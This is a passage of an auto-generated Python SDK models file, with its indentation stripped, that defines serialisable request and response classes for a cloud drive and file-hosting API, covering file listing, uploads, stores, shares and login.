self.parent_file_path = m.get('parent_file_path')
if m.get('share_id') is not None:
self.share_id = m.get('share_id')
if m.get('size') is not None:
self.size = m.get('size')
if m.get('status') is not None:
self.status = m.get('status')
if m.get('thumbnail') is not None:
self.thumbnail = m.get('thumbnail')
if m.get('trashed_at') is not None:
self.trashed_at = m.get('trashed_at')
if m.get('type') is not None:
self.type = m.get('type')
if m.get('updated_at') is not None:
self.updated_at = m.get('updated_at')
if m.get('upload_id') is not None:
self.upload_id = m.get('upload_id')
if m.get('url') is not None:
self.url = m.get('url')
return self
class HostingGetSecureUrlResponse(TeaModel):
"""
获取secure url response
"""
def __init__(
self,
expiration: str = None,
url: str = None,
):
# expiration
self.expiration = expiration
# url
self.url = url
def validate(self):
pass
def to_map(self):
result = dict()
if self.expiration is not None:
result['expiration'] = self.expiration
if self.url is not None:
result['url'] = self.url
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('expiration') is not None:
self.expiration = m.get('expiration')
if m.get('url') is not None:
self.url = m.get('url')
return self
class HostingGetUploadUrlResponse(TeaModel):
"""
Get UploadUrl Response
"""
def __init__(
self,
create_at: str = None,
domain_id: str = None,
drive_id: str = None,
file_path: str = None,
part_info_list: List[UploadPartInfo] = None,
upload_id: str = None,
):
# created_at
self.create_at = create_at
# domain_id
self.domain_id = domain_id
# drive_id
self.drive_id = drive_id
# file_path
self.file_path = file_path
# part_info_list
self.part_info_list = part_info_list
# upload_id
self.upload_id = upload_id
def validate(self):
if self.domain_id is not None:
self.validate_pattern(self.domain_id, 'domain_id', '[a-z0-9A-Z]+')
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
if self.part_info_list:
for k in self.part_info_list:
if k:
k.validate()
def to_map(self):
result = dict()
if self.create_at is not None:
result['create_at'] = self.create_at
if self.domain_id is not None:
result['domain_id'] = self.domain_id
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.file_path is not None:
result['file_path'] = self.file_path
result['part_info_list'] = []
if self.part_info_list is not None:
for k in self.part_info_list:
result['part_info_list'].append(k.to_map() if k else None)
if self.upload_id is not None:
result['upload_id'] = self.upload_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('create_at') is not None:
self.create_at = m.get('create_at')
if m.get('domain_id') is not None:
self.domain_id = m.get('domain_id')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('file_path') is not None:
self.file_path = m.get('file_path')
self.part_info_list = []
if m.get('part_info_list') is not None:
for k in m.get('part_info_list'):
temp_model = UploadPartInfo()
self.part_info_list.append(temp_model.from_map(k))
if m.get('upload_id') is not None:
self.upload_id = m.get('upload_id')
return self
class HostingListFileResponse(TeaModel):
"""
List file response
"""
def __init__(
self,
items: List[BaseHostingFileResponse] = None,
next_marker: str = None,
):
# items
self.items = items
# next_marker
self.next_marker = next_marker
def validate(self):
if self.items:
for k in self.items:
if k:
k.validate()
def to_map(self):
result = dict()
result['items'] = []
if self.items is not None:
for k in self.items:
result['items'].append(k.to_map() if k else None)
if self.next_marker is not None:
result['next_marker'] = self.next_marker
return result
def from_map(self, m: dict = None):
m = m or dict()
self.items = []
if m.get('items') is not None:
for k in m.get('items'):
temp_model = BaseHostingFileResponse()
self.items.append(temp_model.from_map(k))
if m.get('next_marker') is not None:
self.next_marker = m.get('next_marker')
return self
class HostingListUploadedPartResponse(TeaModel):
"""
获取签名 response
"""
def __init__(
self,
file_path: str = None,
next_part_number_marker: str = None,
upload_id: str = None,
uploaded_parts: List[UploadPartInfo] = None,
):
# file_path
self.file_path = file_path
# next_part_number_marker
self.next_part_number_marker = next_part_number_marker
# upload_id
self.upload_id = upload_id
# uploaded_parts
self.uploaded_parts = uploaded_parts
def validate(self):
if self.uploaded_parts:
for k in self.uploaded_parts:
if k:
k.validate()
def to_map(self):
result = dict()
if self.file_path is not None:
result['file_path'] = self.file_path
if self.next_part_number_marker is not None:
result['next_part_number_marker'] = self.next_part_number_marker
if self.upload_id is not None:
result['upload_id'] = self.upload_id
result['uploaded_parts'] = []
if self.uploaded_parts is not None:
for k in self.uploaded_parts:
result['uploaded_parts'].append(k.to_map() if k else None)
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('file_path') is not None:
self.file_path = m.get('file_path')
if m.get('next_part_number_marker') is not None:
self.next_part_number_marker = m.get('next_part_number_marker')
if m.get('upload_id') is not None:
self.upload_id = m.get('upload_id')
self.uploaded_parts = []
if m.get('uploaded_parts') is not None:
for k in m.get('uploaded_parts'):
temp_model = UploadPartInfo()
self.uploaded_parts.append(temp_model.from_map(k))
return self
class HostingMoveFileResponse(TeaModel):
"""
文件移动 response
"""
def __init__(
self,
async_task_id: str = None,
domain_id: str = None,
drive_id: str = None,
file_path: str = None,
share_id: str = None,
):
# async_task_id
self.async_task_id = async_task_id
# domain_id
self.domain_id = domain_id
# drive_id
self.drive_id = drive_id
# file_path
self.file_path = file_path
# drive_id
self.share_id = share_id
def validate(self):
if self.domain_id is not None:
self.validate_pattern(self.domain_id, 'domain_id', '[a-z0-9A-Z-]+')
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
if self.share_id is not None:
self.validate_pattern(self.share_id, 'share_id', '[a-z0-9A-Z]+')
def to_map(self):
result = dict()
if self.async_task_id is not None:
result['async_task_id'] = self.async_task_id
if self.domain_id is not None:
result['domain_id'] = self.domain_id
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.file_path is not None:
result['file_path'] = self.file_path
if self.share_id is not None:
result['share_id'] = self.share_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('async_task_id') is not None:
self.async_task_id = m.get('async_task_id')
if m.get('domain_id') is not None:
self.domain_id = m.get('domain_id')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('file_path') is not None:
self.file_path = m.get('file_path')
if m.get('share_id') is not None:
self.share_id = m.get('share_id')
return self
class HostingSearchFileResponse(TeaModel):
"""
search file response
"""
def __init__(
self,
items: List[BaseHostingFileResponse] = None,
next_marker: str = None,
):
# items
self.items = items
# next_marker
self.next_marker = next_marker
def validate(self):
if self.items:
for k in self.items:
if k:
k.validate()
def to_map(self):
result = dict()
result['items'] = []
if self.items is not None:
for k in self.items:
result['items'].append(k.to_map() if k else None)
if self.next_marker is not None:
result['next_marker'] = self.next_marker
return result
def from_map(self, m: dict = None):
m = m or dict()
self.items = []
if m.get('items') is not None:
for k in m.get('items'):
temp_model = BaseHostingFileResponse()
self.items.append(temp_model.from_map(k))
if m.get('next_marker') is not None:
self.next_marker = m.get('next_marker')
return self
class HostingUpdateFileMetaResponse(TeaModel):
"""
更新文件元数据 response
"""
def __init__(
self,
content_hash: str = None,
content_hash_name: str = None,
content_type: str = None,
crc_64hash: str = None,
created_at: str = None,
description: str = None,
domain_id: str = None,
download_url: str = None,
drive_id: str = None,
file_extension: str = None,
file_path: str = None,
name: str = None,
parent_file_path: str = None,
share_id: str = None,
size: int = None,
status: str = None,
thumbnail: str = None,
trashed_at: str = None,
type: str = None,
updated_at: str = None,
upload_id: str = None,
url: str = None,
):
# Content Hash
self.content_hash = content_hash
# content_hash_name
self.content_hash_name = content_hash_name
# content_type
self.content_type = content_type
# crc64_hash
self.crc_64hash = crc_64hash
# created_at
self.created_at = created_at
# description
self.description = description
# domain_id
self.domain_id = domain_id
# download_url
self.download_url = download_url
# drive_id
self.drive_id = drive_id
# file_extension
self.file_extension = file_extension
# file_path
self.file_path = file_path
# name
self.name = name
# parent_file_id
self.parent_file_path = parent_file_path
# share_id
self.share_id = share_id
# Size
self.size = size
# status
self.status = status
# thumbnail
self.thumbnail = thumbnail
# trashed_at
self.trashed_at = trashed_at
# type
self.type = type
# updated_at
self.updated_at = updated_at
# upload_id
self.upload_id = upload_id
# url
self.url = url
def validate(self):
if self.domain_id is not None:
self.validate_pattern(self.domain_id, 'domain_id', '[a-z0-9A-Z]+')
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
self.validate_required(self.name, 'name')
if self.name is not None:
self.validate_pattern(self.name, 'name', '[a-zA-Z0-9.-]{1,1000}')
if self.parent_file_path is not None:
self.validate_max_length(self.parent_file_path, 'parent_file_path', 50)
self.validate_pattern(self.parent_file_path, 'parent_file_path', '[a-z0-9]{1,50}')
if self.share_id is not None:
self.validate_pattern(self.share_id, 'share_id', '[0-9]+')
if self.size is not None:
self.validate_maximum(self.size, 'size', 53687091200)
self.validate_minimum(self.size, 'size', 0)
def to_map(self):
result = dict()
if self.content_hash is not None:
result['content_hash'] = self.content_hash
if self.content_hash_name is not None:
result['content_hash_name'] = self.content_hash_name
if self.content_type is not None:
result['content_type'] = self.content_type
if self.crc_64hash is not None:
result['crc64_hash'] = self.crc_64hash
if self.created_at is not None:
result['created_at'] = self.created_at
if self.description is not None:
result['description'] = self.description
if self.domain_id is not None:
result['domain_id'] = self.domain_id
if self.download_url is not None:
result['download_url'] = self.download_url
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.file_extension is not None:
result['file_extension'] = self.file_extension
if self.file_path is not None:
result['file_path'] = self.file_path
if self.name is not None:
result['name'] = self.name
if self.parent_file_path is not None:
result['parent_file_path'] = self.parent_file_path
if self.share_id is not None:
result['share_id'] = self.share_id
if self.size is not None:
result['size'] = self.size
if self.status is not None:
result['status'] = self.status
if self.thumbnail is not None:
result['thumbnail'] = self.thumbnail
if self.trashed_at is not None:
result['trashed_at'] = self.trashed_at
if self.type is not None:
result['type'] = self.type
if self.updated_at is not None:
result['updated_at'] = self.updated_at
if self.upload_id is not None:
result['upload_id'] = self.upload_id
if self.url is not None:
result['url'] = self.url
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('content_hash') is not None:
self.content_hash = m.get('content_hash')
if m.get('content_hash_name') is not None:
self.content_hash_name = m.get('content_hash_name')
if m.get('content_type') is not None:
self.content_type = m.get('content_type')
if m.get('crc64_hash') is not None:
self.crc_64hash = m.get('crc64_hash')
if m.get('created_at') is not None:
self.created_at = m.get('created_at')
if m.get('description') is not None:
self.description = m.get('description')
if m.get('domain_id') is not None:
self.domain_id = m.get('domain_id')
if m.get('download_url') is not None:
self.download_url = m.get('download_url')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('file_extension') is not None:
self.file_extension = m.get('file_extension')
if m.get('file_path') is not None:
self.file_path = m.get('file_path')
if m.get('name') is not None:
self.name = m.get('name')
if m.get('parent_file_path') is not None:
self.parent_file_path = m.get('parent_file_path')
if m.get('share_id') is not None:
self.share_id = m.get('share_id')
if m.get('size') is not None:
self.size = m.get('size')
if m.get('status') is not None:
self.status = m.get('status')
if m.get('thumbnail') is not None:
self.thumbnail = m.get('thumbnail')
if m.get('trashed_at') is not None:
self.trashed_at = m.get('trashed_at')
if m.get('type') is not None:
self.type = m.get('type')
if m.get('updated_at') is not None:
self.updated_at = m.get('updated_at')
if m.get('upload_id') is not None:
self.upload_id = m.get('upload_id')
if m.get('url') is not None:
self.url = m.get('url')
return self
class HostingVideoDRMLicenseResponse(TeaModel):
"""
DRM License response
"""
def __init__(
self,
data: str = None,
device_info: str = None,
states: int = None,
):
# drm_data
self.data = data
# device_info
self.device_info = device_info
# states
self.states = states
def validate(self):
self.validate_required(self.data, 'data')
self.validate_required(self.device_info, 'device_info')
self.validate_required(self.states, 'states')
def to_map(self):
result = dict()
if self.data is not None:
result['data'] = self.data
if self.device_info is not None:
result['device_info'] = self.device_info
if self.states is not None:
result['states'] = self.states
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('data') is not None:
self.data = m.get('data')
if m.get('device_info') is not None:
self.device_info = m.get('device_info')
if m.get('states') is not None:
self.states = m.get('states')
return self
class HostingVideoDefinitionResponse(TeaModel):
"""
转码接口response
"""
def __init__(
self,
definition_list: List[str] = None,
frame_rate: str = None,
):
# definition_list
self.definition_list = definition_list
# frame_rate
self.frame_rate = frame_rate
def validate(self):
pass
def to_map(self):
result = dict()
if self.definition_list is not None:
result['definition_list'] = self.definition_list
if self.frame_rate is not None:
result['frame_rate'] = self.frame_rate
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('definition_list') is not None:
self.definition_list = m.get('definition_list')
if m.get('frame_rate') is not None:
self.frame_rate = m.get('frame_rate')
return self
class HostingVideoTranscodeResponse(TeaModel):
"""
转码接口response
"""
def __init__(
self,
definition_list: List[str] = None,
duration: int = None,
hls_time: int = None,
):
# definition_list
self.definition_list = definition_list
# duration
self.duration = duration
# hls_time
self.hls_time = hls_time
def validate(self):
pass
def to_map(self):
result = dict()
if self.definition_list is not None:
result['definition_list'] = self.definition_list
if self.duration is not None:
result['duration'] = self.duration
if self.hls_time is not None:
result['hls_time'] = self.hls_time
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('definition_list') is not None:
self.definition_list = m.get('definition_list')
if m.get('duration') is not None:
self.duration = m.get('duration')
if m.get('hls_time') is not None:
self.hls_time = m.get('hls_time')
return self
class ListAppsRequest(TeaModel):
"""
*\
"""
def __init__(
self,
limit: int = None,
marker: str = None,
):
# 返回结果数据
self.limit = limit
# 下次查询游标
self.marker = marker
def validate(self):
if self.limit is not None:
self.validate_maximum(self.limit, 'limit', 100)
self.validate_minimum(self.limit, 'limit', 1)
def to_map(self):
result = dict()
if self.limit is not None:
result['limit'] = self.limit
if self.marker is not None:
result['marker'] = self.marker
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('limit') is not None:
self.limit = m.get('limit')
if m.get('marker') is not None:
self.marker = m.get('marker')
return self
class ListByAnonymousResponse(TeaModel):
"""
list_file_by_anonymous response
"""
def __init__(
self,
items: List[BaseFileAnonymousResponse] = None,
next_marker: str = None,
):
# items
self.items = items
# next_marker
self.next_marker = next_marker
def validate(self):
if self.items:
for k in self.items:
if k:
k.validate()
def to_map(self):
result = dict()
result['items'] = []
if self.items is not None:
for k in self.items:
result['items'].append(k.to_map() if k else None)
if self.next_marker is not None:
result['next_marker'] = self.next_marker
return result
def from_map(self, m: dict = None):
m = m or dict()
self.items = []
if m.get('items') is not None:
for k in m.get('items'):
temp_model = BaseFileAnonymousResponse()
self.items.append(temp_model.from_map(k))
if m.get('next_marker') is not None:
self.next_marker = m.get('next_marker')
return self
class ListDomainsRequest(TeaModel):
"""
list domain request
"""
def __init__(
self,
limit: int = None,
marker: str = None,
):
# 分页大小
self.limit = limit
# 查询游标
self.marker = marker
def validate(self):
if self.limit is not None:
self.validate_maximum(self.limit, 'limit', 100)
self.validate_minimum(self.limit, 'limit', 1)
def to_map(self):
result = dict()
if self.limit is not None:
result['limit'] = self.limit
if self.marker is not None:
result['marker'] = self.marker
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('limit') is not None:
self.limit = m.get('limit')
if m.get('marker') is not None:
self.marker = m.get('marker')
return self
class ListDriveResponse(TeaModel):
"""
list drive response
"""
def __init__(
self,
items: List[BaseDriveResponse] = None,
next_marker: str = None,
):
# Drive 列表
self.items = items
# 翻页标记
self.next_marker = next_marker
def validate(self):
if self.items:
for k in self.items:
if k:
k.validate()
def to_map(self):
result = dict()
result['items'] = []
if self.items is not None:
for k in self.items:
result['items'].append(k.to_map() if k else None)
if self.next_marker is not None:
result['next_marker'] = self.next_marker
return result
def from_map(self, m: dict = None):
m = m or dict()
self.items = []
if m.get('items') is not None:
for k in m.get('items'):
temp_model = BaseDriveResponse()
self.items.append(temp_model.from_map(k))
if m.get('next_marker') is not None:
self.next_marker = m.get('next_marker')
return self
class ListFileDeltaResponse(TeaModel):
"""
list file op response
"""
def __init__(
self,
cursor: str = None,
has_more: bool = None,
items: List[FileDeltaResponse] = None,
):
# cursor
self.cursor = cursor
# has_more
self.has_more = has_more
# items
self.items = items
def validate(self):
if self.items:
for k in self.items:
if k:
k.validate()
def to_map(self):
result = dict()
if self.cursor is not None:
result['cursor'] = self.cursor
if self.has_more is not None:
result['has_more'] = self.has_more
result['items'] = []
if self.items is not None:
for k in self.items:
result['items'].append(k.to_map() if k else None)
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('cursor') is not None:
self.cursor = m.get('cursor')
if m.get('has_more') is not None:
self.has_more = m.get('has_more')
self.items = []
if m.get('items') is not None:
for k in m.get('items'):
temp_model = FileDeltaResponse()
self.items.append(temp_model.from_map(k))
return self
class ListFileResponse(TeaModel):
"""
List file response
"""
def __init__(
self,
items: List[BaseCCPFileResponse] = None,
next_marker: str = None,
):
# items
self.items = items
# next_marker
self.next_marker = next_marker
def validate(self):
if self.items:
for k in self.items:
if k:
k.validate()
def to_map(self):
result = dict()
result['items'] = []
if self.items is not None:
for k in self.items:
result['items'].append(k.to_map() if k else None)
if self.next_marker is not None:
result['next_marker'] = self.next_marker
return result
def from_map(self, m: dict = None):
m = m or dict()
self.items = []
if m.get('items') is not None:
for k in m.get('items'):
temp_model = BaseCCPFileResponse()
self.items.append(temp_model.from_map(k))
if m.get('next_marker') is not None:
self.next_marker = m.get('next_marker')
return self
class ListShareLinkResponse(TeaModel):
"""
list_share_link response
"""
def __init__(
self,
items: List[BaseShareLinkResponse] = None,
next_marker: str = None,
):
# items
self.items = items
# next_marker
self.next_marker = next_marker
def validate(self):
if self.items:
for k in self.items:
if k:
k.validate()
def to_map(self):
result = dict()
result['items'] = []
if self.items is not None:
for k in self.items:
result['items'].append(k.to_map() if k else None)
if self.next_marker is not None:
result['next_marker'] = self.next_marker
return result
def from_map(self, m: dict = None):
m = m or dict()
self.items = []
if m.get('items') is not None:
for k in m.get('items'):
temp_model = BaseShareLinkResponse()
self.items.append(temp_model.from_map(k))
if m.get('next_marker') is not None:
self.next_marker = m.get('next_marker')
return self
class ListShareResponse(TeaModel):
"""
List share response
"""
def __init__(
self,
items: List[BaseShareResponse] = None,
next_marker: str = None,
):
# items
self.items = items
# next_marker
self.next_marker = next_marker
def validate(self):
if self.items:
for k in self.items:
if k:
k.validate()
def to_map(self):
result = dict()
result['items'] = []
if self.items is not None:
for k in self.items:
result['items'].append(k.to_map() if k else None)
if self.next_marker is not None:
result['next_marker'] = self.next_marker
return result
def from_map(self, m: dict = None):
m = m or dict()
self.items = []
if m.get('items') is not None:
for k in m.get('items'):
temp_model = BaseShareResponse()
self.items.append(temp_model.from_map(k))
if m.get('next_marker') is not None:
self.next_marker = m.get('next_marker')
return self
class StoreFile(TeaModel):
"""
*\
"""
def __init__(
self,
domain_id: str = None,
name: str = None,
parent_file_path: str = None,
store_id: str = None,
type: str = None,
):
self.domain_id = domain_id
self.name = name
self.parent_file_path = parent_file_path
self.store_id = store_id
self.type = type
def validate(self):
pass
def to_map(self):
result = dict()
if self.domain_id is not None:
result['domain_id'] = self.domain_id
if self.name is not None:
result['name'] = self.name
if self.parent_file_path is not None:
result['parent_file_path'] = self.parent_file_path
if self.store_id is not None:
result['store_id'] = self.store_id
if self.type is not None:
result['type'] = self.type
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('domain_id') is not None:
self.domain_id = m.get('domain_id')
if m.get('name') is not None:
self.name = m.get('name')
if m.get('parent_file_path') is not None:
self.parent_file_path = m.get('parent_file_path')
if m.get('store_id') is not None:
self.store_id = m.get('store_id')
if m.get('type') is not None:
self.type = m.get('type')
return self
class ListStoreFileResponse(TeaModel):
"""
List storage file
"""
def __init__(
self,
items: List[StoreFile] = None,
next_marker: str = None,
):
# items
file list
self.items = items
self.next_marker = next_marker
def validate(self):
if self.items:
for k in self.items:
if k:
k.validate()
def to_map(self):
result = dict()
result['items'] = []
if self.items is not None:
for k in self.items:
result['items'].append(k.to_map() if k else None)
if self.next_marker is not None:
result['next_marker'] = self.next_marker
return result
def from_map(self, m: dict = None):
m = m or dict()
self.items = []
if m.get('items') is not None:
for k in m.get('items'):
temp_model = StoreFile()
self.items.append(temp_model.from_map(k))
if m.get('next_marker') is not None:
self.next_marker = m.get('next_marker')
return self
class StoreItemResponse(TeaModel):
"""
*\
"""
def __init__(
self,
accelerate_endpoint: str = None,
base_path: str = None,
bucket: str = None,
cdn_endpoint: str = None,
customized_accelerate_endpoint: str = None,
customized_cdn_endpoint: str = None,
customized_endpoint: str = None,
customized_internal_endpoint: str = None,
domain_id: str = None,
endpoint: str = None,
internal_endpoint: str = None,
location: str = None,
ownership: str = None,
policy: str = None,
role_arn: str = None,
store_id: str = None,
type: str = None,
):
# 全球加速地址
self.accelerate_endpoint = accelerate_endpoint
# 存储公共前缀
self.base_path = base_path
# bucket名称
self.bucket = bucket
# 内容分发地址
self.cdn_endpoint = cdn_endpoint
# 自定义全球加速地址
self.customized_accelerate_endpoint = customized_accelerate_endpoint
# 自定义内容分发地址
self.customized_cdn_endpoint = customized_cdn_endpoint
# 自定义Public访问地址
self.customized_endpoint = customized_endpoint
# 自定义vpc访问地址
self.customized_internal_endpoint = customized_internal_endpoint
self.domain_id = domain_id
# Public访问地址
self.endpoint = endpoint
# vpc访问地址
self.internal_endpoint = internal_endpoint
# 地点
self.location = location
# 存储归属,system表示系统提供,custom表示使用自己的存储
self.ownership = ownership
# Policy授权,system类型store会将bucket权限授予当前云账号
self.policy = policy
# 访问Bucket的角色ARN
self.role_arn = role_arn
# store ID
self.store_id = store_id
# 存储类型,当前只支持oss
self.type = type
def validate(self):
self.validate_required(self.bucket, 'bucket')
self.validate_required(self.endpoint, 'endpoint')
self.validate_required(self.ownership, 'ownership')
self.validate_required(self.policy, 'policy')
self.validate_required(self.store_id, 'store_id')
self.validate_required(self.type, 'type')
def to_map(self):
result = dict()
if self.accelerate_endpoint is not None:
result['accelerate_endpoint'] = self.accelerate_endpoint
if self.base_path is not None:
result['base_path'] = self.base_path
if self.bucket is not None:
result['bucket'] = self.bucket
if self.cdn_endpoint is not None:
result['cdn_endpoint'] = self.cdn_endpoint
if self.customized_accelerate_endpoint is not None:
result['customized_accelerate_endpoint'] = self.customized_accelerate_endpoint
if self.customized_cdn_endpoint is not None:
result['customized_cdn_endpoint'] = self.customized_cdn_endpoint
if self.customized_endpoint is not None:
result['customized_endpoint'] = self.customized_endpoint
if self.customized_internal_endpoint is not None:
result['customized_internal_endpoint'] = self.customized_internal_endpoint
if self.domain_id is not None:
result['domain_id'] = self.domain_id
if self.endpoint is not None:
result['endpoint'] = self.endpoint
if self.internal_endpoint is not None:
result['internal_endpoint'] = self.internal_endpoint
if self.location is not None:
result['location'] = self.location
if self.ownership is not None:
result['ownership'] = self.ownership
if self.policy is not None:
result['policy'] = self.policy
if self.role_arn is not None:
result['role_arn'] = self.role_arn
if self.store_id is not None:
result['store_id'] = self.store_id
if self.type is not None:
result['type'] = self.type
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('accelerate_endpoint') is not None:
self.accelerate_endpoint = m.get('accelerate_endpoint')
if m.get('base_path') is not None:
self.base_path = m.get('base_path')
if m.get('bucket') is not None:
self.bucket = m.get('bucket')
if m.get('cdn_endpoint') is not None:
self.cdn_endpoint = m.get('cdn_endpoint')
if m.get('customized_accelerate_endpoint') is not None:
self.customized_accelerate_endpoint = m.get('customized_accelerate_endpoint')
if m.get('customized_cdn_endpoint') is not None:
self.customized_cdn_endpoint = m.get('customized_cdn_endpoint')
if m.get('customized_endpoint') is not None:
self.customized_endpoint = m.get('customized_endpoint')
if m.get('customized_internal_endpoint') is not None:
self.customized_internal_endpoint = m.get('customized_internal_endpoint')
if m.get('domain_id') is not None:
self.domain_id = m.get('domain_id')
if m.get('endpoint') is not None:
self.endpoint = m.get('endpoint')
if m.get('internal_endpoint') is not None:
self.internal_endpoint = m.get('internal_endpoint')
if m.get('location') is not None:
self.location = m.get('location')
if m.get('ownership') is not None:
self.ownership = m.get('ownership')
if m.get('policy') is not None:
self.policy = m.get('policy')
if m.get('role_arn') is not None:
self.role_arn = m.get('role_arn')
if m.get('store_id') is not None:
self.store_id = m.get('store_id')
if m.get('type') is not None:
self.type = m.get('type')
return self
class ListStoreResponse(TeaModel):
"""
List storage
"""
def __init__(
self,
items: List[StoreItemResponse] = None,
):
# items
self.items = items
def validate(self):
if self.items:
for k in self.items:
if k:
k.validate()
def to_map(self):
result = dict()
result['items'] = []
if self.items is not None:
for k in self.items:
result['items'].append(k.to_map() if k else None)
return result
def from_map(self, m: dict = None):
m = m or dict()
self.items = []
if m.get('items') is not None:
for k in m.get('items'):
temp_model = StoreItemResponse()
self.items.append(temp_model.from_map(k))
return self
class ListStoresRequest(TeaModel):
"""
*\
"""
def __init__(
self,
domain_id: str = None,
):
# domain ID
self.domain_id = domain_id
def validate(self):
self.validate_required(self.domain_id, 'domain_id')
def to_map(self):
result = dict()
if self.domain_id is not None:
result['domain_id'] = self.domain_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('domain_id') is not None:
self.domain_id = m.get('domain_id')
return self
class ListUploadedPartResponse(TeaModel):
"""
获取签名 response
"""
def __init__(
self,
file_id: str = None,
next_part_number_marker: str = None,
upload_id: str = None,
uploaded_parts: List[UploadPartInfo] = None,
):
# file_id
self.file_id = file_id
# next_part_number_marker
self.next_part_number_marker = next_part_number_marker
# upload_id
self.upload_id = upload_id
# uploaded_parts
self.uploaded_parts = uploaded_parts
def validate(self):
if self.file_id is not None:
self.validate_max_length(self.file_id, 'file_id', 50)
self.validate_pattern(self.file_id, 'file_id', '[a-z0-9]{1,50}')
if self.uploaded_parts:
for k in self.uploaded_parts:
if k:
k.validate()
def to_map(self):
result = dict()
if self.file_id is not None:
result['file_id'] = self.file_id
if self.next_part_number_marker is not None:
result['next_part_number_marker'] = self.next_part_number_marker
if self.upload_id is not None:
result['upload_id'] = self.upload_id
result['uploaded_parts'] = []
if self.uploaded_parts is not None:
for k in self.uploaded_parts:
result['uploaded_parts'].append(k.to_map() if k else None)
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('file_id') is not None:
self.file_id = m.get('file_id')
if m.get('next_part_number_marker') is not None:
self.next_part_number_marker = m.get('next_part_number_marker')
if m.get('upload_id') is not None:
self.upload_id = m.get('upload_id')
self.uploaded_parts = []
if m.get('uploaded_parts') is not None:
for k in m.get('uploaded_parts'):
temp_model = UploadPartInfo()
self.uploaded_parts.append(temp_model.from_map(k))
return self
class LoginByCodeRequest(TeaModel):
"""
*\
"""
def __init__(
self,
access_token: str = None,
app_id: str = None,
auth_code: str = None,
type: str = None,
):
# 鉴权后返回的accessToken,淘宝登录需要此字段
self.access_token = access_token
# App ID, 当前访问的App
self.app_id = app_id
# 鉴权后返回的AuthCode,支付宝登录需要此字段
self.auth_code = auth_code
# 鉴权类型,淘宝、支付宝
self.type = type
def validate(self):
self.validate_required(self.app_id, 'app_id')
self.validate_required(self.type, 'type')
def to_map(self):
result = dict()
if self.access_token is not None:
result['access_token'] = self.access_token
if self.app_id is not None:
result['app_id'] = self.app_id
if self.auth_code is not None:
result['auth_code'] = self.auth_code
if self.type is not None:
result['type'] = self.type
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('access_token') is not None:
self.access_token = m.get('access_token')
if m.get('app_id') is not None:
self.app_id = m.get('app_id')
if m.get('auth_code') is not None:
self.auth_code = m.get('auth_code')
if m.get('type') is not None:
self.type = m.get('type')
return self
class LogoutRequest(TeaModel):
"""
*\
"""
def __init__(
self,
back_url: str = None,
client_id: str = None,
login_type: str = None,
):
# 登出之后的跳转地址,默认跳转到App的域名下
self.back_url = back_url
# Client ID, 此处填写创建App时返回的AppID
self.client_id = client_id
# 用户自定义字段,会在鉴权成功后的callback带回
self.login_type = login_type
def validate(self):
self.validate_required(self.client_id, 'client_id')
def to_map(self):
result = dict()
if self.back_url is not None:
result['BackUrl'] = self.back_url
if self.client_id is not None:
result['ClientID'] = self.client_id
if self.login_type is not None:
result['LoginType'] = self.login_type
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('BackUrl') is not None:
self.back_url = m.get('BackUrl')
if m.get('ClientID') is not None:
self.client_id = m.get('ClientID')
if m.get('LoginType') is not None:
self.login_type = m.get('LoginType')
return self
class MobileCheckExistRequest(TeaModel):
"""
*\
"""
def __init__(
self,
headers: Dict[str, str] = None,
app_id: str = None,
phone_number: str = None,
phone_region: str = None,
):
self.headers = headers
# App ID, 当前访问的App
self.app_id = app_id
# 待查询的手机号
self.phone_number = phone_number
# 国家编号,默认86,不需要填+号,直接填数字
self.phone_region = phone_region
def validate(self):
self.validate_required(self.app_id, 'app_id')
self.validate_required(self.phone_number, 'phone_number')
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.app_id is not None:
result['app_id'] = self.app_id
if self.phone_number is not None:
result['phone_number'] = self.phone_number
if self.phone_region is not None:
result['phone_region'] = self.phone_region
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('app_id') is not None:
self.app_id = m.get('app_id')
if m.get('phone_number') is not None:
self.phone_number = m.get('phone_number')
if m.get('phone_region') is not None:
self.phone_region = m.get('phone_region')
return self
class MobileLoginRequest(TeaModel):
"""
*\
"""
def __init__(
self,
headers: Dict[str, str] = None,
app_id: str = None,
auto_register: bool = None,
captcha_id: str = None,
captcha_text: str = None,
encrypted_key: str = None,
nvc_param: str = None,
password: str = None,
phone_number: str = None,
phone_region: str = None,
sms_code: str = None,
sms_code_id: str = None,
):
self.headers = headers
# App ID, 当前访问的App
self.app_id = app_id
# 是否自动注册用户,使用密码登录此参数不生效
self.auto_register = auto_register
# 图片验证码ID, 密码登录需要此参数
self.captcha_id = captcha_id
# 用户输入的验证码值, 密码登录需要此参数
self.captcha_text = captcha_text
# AES-256对称加密密钥,通过App公钥加密后传输
self.encrypted_key = encrypted_key
# 环境参数
self.nvc_param = nvc_param
# 登录密码, 传入此参数则忽略短信验证码,不传此参数则默认使用短信登录。
self.password = password
# 待查询的手机号
self.phone_number = phone_number
